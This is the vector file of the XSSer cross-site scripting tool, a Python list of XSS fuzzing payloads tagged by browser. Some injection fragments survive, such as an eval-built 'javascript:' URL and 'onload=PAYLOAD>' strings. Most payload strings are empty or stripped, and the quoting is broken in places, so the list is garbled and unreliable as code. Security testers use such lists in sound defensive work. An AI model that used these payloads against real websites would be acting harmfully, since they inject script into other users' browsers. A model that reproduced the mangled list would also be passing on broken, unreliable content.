#!/usr/bin/env python # -*- coding: utf-8 -*-" # vim: set expandtab tabstop=4 shiftwidth=4: """ $Id$ This file is part of the xsser project, http://xsser.03c8.net Copyright (c) 2011/2016 psy xsser is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation version 3 of the License. xsser is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with xsser; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA """ ## This file contains different XSS fuzzing vectors. ## If you have some new, please email me to [epsylon@riseup.net] ## Happy Cross Hacking! ;) vectors = [ { 'payload':'''">PAYLOAD''', 'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""}, { 'payload':"""">""", 'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""}, { 'payload':"""PAYLOAD""", 'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""}, { 'payload':"""">

""", 'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""}, { 'payload':"""""", 'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""}, { 'payload':"""'';!--"=&{()}" """, 'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""}, { 'payload':"""

""", 'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""}, { 'payload':"""

""", 'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""}, { 'payload':"""

""", 'browser':"""[IE6.0|NS8.1-IE]"""}, { 'payload':'''PAYLOAD">''', 'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""}, { 'payload':"""

""", 'browser':"""[IE6.0|NS8.1-IE]"""}, { 'payload':"""

""", 'browser':"""[IE6.0|NS8.1-IE]"""}, { 'payload':"""<""", 'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""}, { 'payload':"""\";PAYLOAD//""", 'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""}, { 'payload':"""

""", 'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""}, { 'payload':"""""", 'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""}, { 'payload':"""""", 'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""}, { 'payload':"""""", 'browser':"""[IE6.0|NS8.1-IE]"""}, { 'payload':"""""", 'browser':"""[IE6.0|NS8.1-IE]"""}, { 'payload':"""""", 'browser':"""[O9.02]"""}, { 'payload':"""
""", 'browser':"""[NS4]"""}, { 'payload':"""""", 'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""}, { 'payload':"""

""", 'browser':"""[IE6.0|NS8.1-IE]"""}, { 'payload':"""

""", 'browser':"""[NS4]"""}, { 'payload':"""

""", 'browser':"""[NS4]"""}, { 'payload':"""""", 'browser':"""[IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""}, { 'payload':"""""", 'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""}, { 'payload':"""

""", 'browser':"""[O9.02]"""}, { 'payload':"""

""", 'browser':"""[IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""}, { 'payload':"""

""", 'browser':"""[IE6.0|NS8.1-IE]"""}, { 'payload':"""

""", 'browser':"""[IE7.0|IE6.0|NS8.1-IE]"""}, { 'payload':"""""", 'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""}, { 'payload':"""""", 'browser':"""Not Info"""}, { 'payload':"""""", 'browser':"""Not Info"""}, { 'payload':"""""", 'browser':"""Not Info"""}, { 'payload':"""""", 'browser':"""Not Info"""}, { 'payload':""" onload=PAYLOAD>""", 'browser':"""Not Info"""}, { 'payload':""" onload=PAYLOAD>""", 'browser':"""Not Info"""}, { 'payload':"""""", 'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""}, { 'payload':"""""", 'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""}, { 'payload':"""

""", 'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""}, { 'payload':"""

""", 'browser':"""[IE6.0|NS8.1-IE]"""}, { 'payload':"""

""", 'browser':"""[IE7.0|IE6.0|NS8.1-IE]"""}, { 'payload':"""""", 'browser':"""[IE7.0|IE6.0|NS8.1-IE]"""}, { 'payload':"""""", 'browser':"""[IE7.0|IE6.0|NS8.1-IE]"""}, { 'payload':"""""", 'browser':"""[NS4]"""}, { 'payload':"""""", 'browser':"""[IE6.0|NS8.1-IE]"""}, { 'payload':"""""", 'browser':"""[IE6.0|NS8.1-IE]"""}, { 'payload':"""""", 'browser':"""[IE7.0|IE6.0|NS8.1-IE]"""}, { 'payload':"""""", 'browser':"""[IE6.0|NS8.1-IE]"""}, { 'payload':"""

""", 'browser':"""[O9.02]"""}, { 'payload':"""a="get";b="URL(\"";c="javascript:";d="PAYLOAD\")";eval(a+b+c+d);""", 'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""}, { 'payload':"""PAYLOAD'); ?>""", 'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""}, { 'payload':"""""", 'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""}, { 'payload':"""""", 'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""}, { 'payload':"""

""", 'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""}, { 'payload':"""

""", 'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""}, { 'payload':"""---

""", 'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""}, { 'payload':'''---

a=/PAYLOAD/alert(a.source)""", 'browser':"""[Not Info]"""}, { 'payload':'''--- \";PAYLOAD;//''', 'browser':"""[Not Info]"""}, { 'payload':'''''', 'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""}, { 'payload':"""""", 'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""}, { 'payload':"""''', 'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""}, { 'payload':'''''', 'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""}, { 'payload':'''''', 'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""}, { 'payload':'''''', 'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""}, { 'payload':'''''', 'browser':"""[IE] [Chrome]"""}, { 'payload':'''''', 'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""}, { 'payload':'''''', 'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""}, { 'payload':'''''', 'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""}, { 'payload':'''''', 'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""}, { 'payload':'''''', 'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""}, { 'payload':'''''', 'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""}, { 'payload':'''''', 'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""}, { 'payload':'''''', 'browser':"""[HTML5 Injection]"""}, { 'payload':'''''', 'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""}, { 'payload':'''''', 'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""}, { 'payload':'''''', 'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""}, { 'payload':'''''', 'browser':"""[IE] [Chrome]"""}, { 'payload':'''''', 'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""}, { 'payload':'''''', 'browser':"""[IE] [Chrome]"""}, { 'payload':'''''', 'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""}, { 'payload':'''''', 'browser':"""[HTML5 Injection]"""}, { 'payload':'''''', 'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""}, { 'payload':'''''', 'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""}, { 'payload':'''''', 'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""}, { 'payload':'''''', 'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""}, { 'payload':'''''', 'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""}, { 'payload':'''''', 'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""}, { 'payload':'''''', 'browser':"""[Not Info]"""}, { 'payload':'''''', 'browser':"""[Not Info]"""}, { 'payload':'''''', 'browser':"""[Not Info]"""}, { 'payload':'''''', 'browser':"""[IE] [Chrome]"""}, { 'payload':'''''', 'browser':"""[Not Info]"""}, { 'payload':'''''', 'browser':"""[Not Info]"""}, { 'payload':'''''', 'browser':"""[Not Info]"""}, { 'payload':'''''', 'browser':"""[Not Info]"""}, { 'payload':'''

''', 'browser':"""[Not Info]"""}, { 'payload':'''''', 'browser':"""[Not Info]"""}, { 'payload':'''''', 'browser':"""[Not Info]"""}, { 'payload':'''''', 'browser':"""[Not Info]"""}, { 'payload':'''''', 'browser':"""[Not Info]"""}, { 'payload':'''''', 'browser':"""[Not Info]"""}, { 'payload':'''''', 'browser':"""[Not Info]"""}, { 'payload':'''''', 'browser':"""[Not Info]"""}, { 'payload':'''''', 'browser':"""[Not Info]"""}, { 'payload':'''

''', 'browser':"""[Not Info]"""}, { 'payload':'''''', 'browser':"""[Not Info]"""}, { 'payload':'''''', 'browser':"""[Not Info]"""}, { 'payload':'''''', 'browser':"""[Not Info]"""}, { 'payload':'''''', 'browser':"""[Not Info]"""}, { 'payload':'''''', 'browser':"""[Not Info]"""}, { 'payload':'''''', 'browser':"""[Not Info]"""}, { 'payload':'''''', 'browser':"""[Not Info]"""}, { 'payload':'''